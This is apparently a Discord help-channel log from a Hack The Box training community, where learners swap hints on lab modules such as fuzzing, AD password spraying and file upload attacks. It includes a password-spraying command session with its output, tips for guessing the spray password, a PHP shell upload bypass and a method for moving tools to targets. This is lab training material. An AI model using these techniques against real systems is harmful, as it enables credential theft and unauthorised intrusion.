yea i just realized that, lol!

let me try again

Your filter is wrong
Use Content-Length

just Content-Length?

If I remember correctly, each parameter returns the code 200. So you cannot filter by it

yes

used this and too many responses

Yes, because each parameter returns the status code 200. So you have to filter according to a different criterion

used this and too many responses

Because you're not changing your filter

Also deleting bc spoilers

okay

what filter should i use

...

Size

Look at the most common size response being thrown at you

Then [f]ilter by [s]ize

-fs you mean?

Try first. Ask questions later

In this field you have to be willing to take a suggestion, and extract the meaningful info and run with it

Is someone having trouble with the machine of Active Directory Skills Assessment Part II 2?

I restarted it several times, terminated and started again. I chanve to different VPN regions.
But as soon as I login to the machine and do a simple ls command, it freezes forever

Change vpn regions

Wait at least 5-10 minutes after spawning to ensure all services have been launched

done: from EU (low load) to US (low load) and picking the recommended

Startmachine 120 min
I went to lunch and it was 90 min, with the same slow

Reach out to support then

ok thks

Hello .

Someone for the second question of the "Introduction to Binary Fuzzing module"
<<What is the name of the vulnerable variable that ASan has identified and what line does it exist on? Answer by copying the exact ASan output, 'variable_name' (line 123) >>

Thanks in advance

couldn't decode the session and i intercepted responses but nothing no.

there are no interesting parameters as far as i know that i can manipulate

Look again in the module. It will show you what you need to do.

nvm i solved it

thanks xD

there were interesting stuff actually .

can someone suggest which wordlist should i use to get the password, tried using rockyou but its working very slow not more than 2req/sec

I'd recommend a custom wordlist based off a policy, if that is the correct skills assessment.

Is there someone that can shed some light for me in the Whitebox attacks module, section type juggling - authentication bypass ?

thanks man, i forgot that step

@crisp remnant how can you make hash() return null

Yea this is exactly the thing that i am wondering..... no matter how and what i try it always return a hash....

there is a way... use ||array()||

#boxes read and follow #welcome to access, also avoid spoilers

hmm i already tried that... i am testing with a simple code, but even emptry array ([]) is being hashed...

Hello i am still very new to the hack the box stuff and i am having this issue with the command I am very confused because it was working when i did the previous module. I'm unsure of what the issue is would anyone be able to help explain?

Try restarting the lab

Refrain from giving direct answers/code

If you feel it necessary take to dms

It worked fine for me from what I recall

mhmmm, here is my codechain:

Don't share direct code as it's a spoiler

oh sorry

That's like.. three times..

There's a reason it was deleted at first

sorry

Your php code seems to be missing the $_GET

From what I glimpsed

its there 😉

¯_(ツ)_/¯

I just followed the section and it worked

ill recheck everything

ty anyways!

I've found my new favorite fake user/pass to use in account creations like gitlab "apple:bee"

pfff my mistake was with the username and not the password.... 😮‍💨

hi ihave problem with AD Internal Password Spraying
Evil-WinRM PS C:\tools> Import-Module .\DomainPasswordSpray.ps1
Evil-WinRM PS C:\tools> Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
[] Now creating a list of users to spray...
[] There appears to be no lockout policy.
[] Removing disabled users from list.
[] There are 2940 total users found.
[] Removing users within 1 attempt of locking out from list.
[] Created a userlist containing 0 users gathered from the current user's domain
[] The domain password policy observation window is set to minutes.
[] Setting a minute wait in between sprays.
it is not give me users how to solve it?

Add a ! To the end of the password?

ping srv02

err: Destination Unreachable: no route to host

https://tenor.com/view/thats-the-beginning-of-the-end-neil-degrasse-tyson-star-talk-over-done-gif-20197222

i don't understant why iadd a?

password policies :P

Can someone help me with the API attack module? Broken authentication and MasonJenkins@ymail.com?

My idea is to use the password resets function and iterate through the OTPs. But somehow my ffuf command returns nothing And I can't login with my suggested password. Any hints? PM for command

Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer. it is not work

ah

did you create a user list?

Lemme check my notes.

it's been a min since i've done that module

You can DM.

add the .txt extension to the -OutFile

otherwise reset the target wait 5-10 minutes for all services to start up, try again

did you run powershell as admin

try actually remoting in via RDP

instead of win-rm

as the instructions state to RDP to the target

okay thank you

Hi guys

What's up

Is there anyone I can talk to?

about?

@rustic sage no sharing of payloads etc for modules above Tier 0, please

Oh sorry didnt realize that wasnt allowed!

Mention which module / section you're stuck on, someone may reach out and DM to provide some advice

Yeah

Nobody reads the ToS

😢

reading is for nerds

lol

Nerds rock

Are there hackers here?

So that's fine

what do you need help with?

Dear HTB community. Please safe my sanity. If anybody is available to assist me with the Client side prototype pollution please DM.

Thanks 🙂

@fathom pendant I was wondering if anyone knows how to make money.

that wasn't an invitation to DM @latent moss

Job

https://tenor.com/view/apply-apply-apply-apply-typing-keyboard-jim-carrey-gif-21002173

The 8-5 thing has been working for me

@fathom pendant 😂

ah nvm it wasn't you that dmed

it was someone else

just making asssumptions bc i saw message requests: 1 right after asking

different username

that i immediately forgor

bc i yeet and delete them

Is everyone here a white hat hacker?

This platform/server revolves around whitehat hacking

not illegal shit like carding

@fathom pendant I understand

not to mention servers that would provide assistance with illegal activities generally won't last long

especially if they're open to the public

@fathom pendant So, is it difficult to get into this business?

depends where you live

¯_(ツ)_/¯

the market is also heavily saturated atm

@fathom pendant Is it possible to become a hacker from your phone?

lol not without a substantial amount of skill

hacking from your phone is a big meme

most people have a dedicated workstation/laptop with a pentest VM that they run off of

@fathom pendant Dude, I needed money for a computer, so I found this place, hoping you might know a way.

Everyone is born with nothing, some have family with wealth, some earn it, some get lucky

Gotta run with the hand you got, and start getting that wonga

Anyone who doesn't inherit money has always started working at a crappy job, well.. most I guess

Gotta put the effort in, in all things in life

@ocean night That's why I asked if there was a way to make money.

get a job

you don't have to jump out the gate into pentesting/cyber

that's how you make money

Stack shelves, do a paper run, odd jobs, car wash, gardening

Get money enough to get kit to help you grow (e.g. laptop)

i've put an application to a small store up the street that has nothing to do with IT/Cyber

Keep growing, keep earning

silly holiday delaying my app being read by HTB

I mean, can I make money through social media? If I'm going to get into this business, should I use my laptop or should I use a cash register directly (I'm translating it from Google, it's a little late)

making money through social media is ROUGH

If you don't mind.. what point of education are you in?

(I am NOT asking your age)

so don't be too specific

Secondary, college?

How old do you think I am?

I'm not going to guess

17

yeah figured, you have high expectations with little actual experience

focus on finishing school first

then get some job that can give you the spending money for your own personal improvement

No, I'm not expecting anything big, I just asked for a place where I could talk about artificial intelligence, she suggested this place, I was just asking a question.

If your hobby is computers, programming, keep growing that hobby

But yeah.. focus on schooling first

HTB is not a place to ask about AI

lol

Self taught are sometimes some of the best and most adaptable people I've seen

if you read and follow the instructions in #welcome you can ask more in #programming as we're veering this conversation off-topic

sometimes, college and uni works better for people

It's all down to how you absorb knowledge, your persistence and drive to improve yourself, or to be shown the path and follow it as in higher education

@ocean night Anyway my friend, I understand you, thank you

👍 all the best

what kinda g0blin are you anyway

Start saving early, too

Every little counts 🙂

A MTG red deck g0blin

Cheap to cast, but devastating in numbers

mind goblin?

my favorite MTG gob is the one that lets you throw other goblins, maximum goblin efficiency

hehehe

I stopped playing around 7th ed

but I have a nice collection of gobbos from there and prior

I found my old Niv-Mizzet Highlander deck

lots of ping for 1 damage and draw cards

🙂

@ocean night Dude, I'm leaving, thank you for your help.

Loved playing "no holds barred" games.. no enforce starting deck size, coming up with stupid ass once turn booooooom

I still will not forgive them for implementing a limit on lightning bolts in the deck lol

Anyway sorry, totally off topic, going back to general

how to fix this problem I can not download becuase the hackthebox rdp does not have internet and even though I have shared the desktop of my attack box errors presist

try transferring the files to the host instead of running it from the shared folder

also you have a shared drive attached...

just cp /shared/file ~./

gives error i tried that

lemme try again and share

Try with remmina

also i could have sworn kerbrute is already on that host

It doesn't Connect using remmina

Okay, sorry

do me a favor

just do kerb then hit tab a few times

okay

ah shit I am sorry

always try and see if a tool exists on the host before attempting to install

okay thanks a lot

can someone please help me with the exploits module?

i cant even send a screenshot or copy the console, but im on the expoliting part of the getting started and when i follow the instructions i dont get the same output

dude i forgot how powerful -exec is in the find command

don't copy the example 1::1 use your own IP where needed, and the targetIP where also required

also getting started is the module; public exploits would be the section

you're not gonna get the same exploit as the example; I suggest (usually) when given a publicIP:Port attempt to visit it in a browser

The "instructions" in the section are general and basic "how to" once you find some info to go off of

Also keep in mind that any tools that need to be transferred to a target can be done so through serving the tool up using a web server on your attack machine. My favorite method of doing this is python3 -m http.server 8000. Then use wget from the target to retrieve the files.

well, yeah, i put in the correct ip and port and stuff

yes but it might not be using the same exploit as the example :)

in order to crack an egg, you must first find the egg

so i first have to find services to exploit and then search for an exploit for that?

👍

it's a safe bet in most instances with an IP:PORT that it's hosting a webserver (in htb's case)

unless otherwise explicitly told

often the best way to find a service, is just by looking at the page :)

so even the http is a service that can be exploited?

Okay gotcha

Hey in the file upload attacks module the client side validation section i try to upload a file .php even after editing out the function validate after using the inspect option and all im not able to upload the .php shell

Also i try to capture the req using burp that also isnt getting captured i dont knw what the problem is

do you have interceptor turned on, and your foxyproxy turned on so burp can catch the request?

but there's no req made when going to grab the file from your system to upload* if you're referring to the server response that serves you the page you'd need to hard reload the page [ctr+shift+r] otherwise browser serves from cache, which doesn't send a req

add .php to the list of allowed extensions